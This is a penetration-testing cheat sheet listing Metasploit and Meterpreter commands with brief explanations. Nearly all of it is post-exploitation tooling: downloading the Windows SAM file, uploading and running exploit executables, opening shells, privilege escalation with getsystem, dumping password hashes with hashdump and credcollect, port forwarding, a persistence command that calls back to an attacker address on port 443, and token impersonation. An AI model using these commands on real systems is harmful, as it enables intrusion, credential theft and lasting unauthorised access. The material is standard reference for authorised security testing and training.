Metasploit commands

Identify other machines that the supplied domain user has administrative access to

msf> run post/windows/gather/local_admin_search_enum

Communicate with a host, similar to interacting via netcat, taking advantage of any configured session pivoting:

msf> connect $TARGET $PORT

Uses SSL:

msf> connect -s $TARGET $PORT

Starts ruby shell:

msf> irb

Integrations with other tools:

msf> load pcap, wmap, nessus

Run nmap from metasploit:

msf > nmap -v -sV 192.168.1.0/24 -oA subnet_1

Show scan data:

msf> db_hosts
msf> db_vulns
msf> db_exploited

Useful commands with Meterpreter

Upload file to Windows target:

meterpreter> upload file c:\\windows

Download file from Windows target:

meterpreter> download c:\\windows\\repair\\sam /tmp

Run .exe on target (handy for executing uploaded exploits):

meterpreter> execute -f c:\\windows\\temp\\exploit.exe

Creates new channel with cmd shell:

meterpreter> execute -f cmd -c

Show processes:

meterpreter> ps

Get shell on the target:

meterpreter> shell

Attempts privilege escalation on the target:

meterpreter> getsystem

Attempts to dump the hashes on the target:

meterpreter> hashdump

meterpreter> credcollect

Create port forward to target machine:

meterpreter> portfwd add –l 3389 –p 3389 –r $IP

Delete port forward:

meterpreter> portfwd delete –l 3389 –p 3389 –r $IP

Search excel files on target machine:

meterpreter> search -f *.xlsx

Get user id:

meterpreter> getuid

Check whether arch == meterpreter or migrate to x64 process!!

meterpreter> sysinfo

Meterpreter persistence mode

meterpreter> run persistence -U -i 5 -p 443 -r $IP

Impersonate any user

meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> impersonate_token MACHINE\\user
meterpreter> drop_token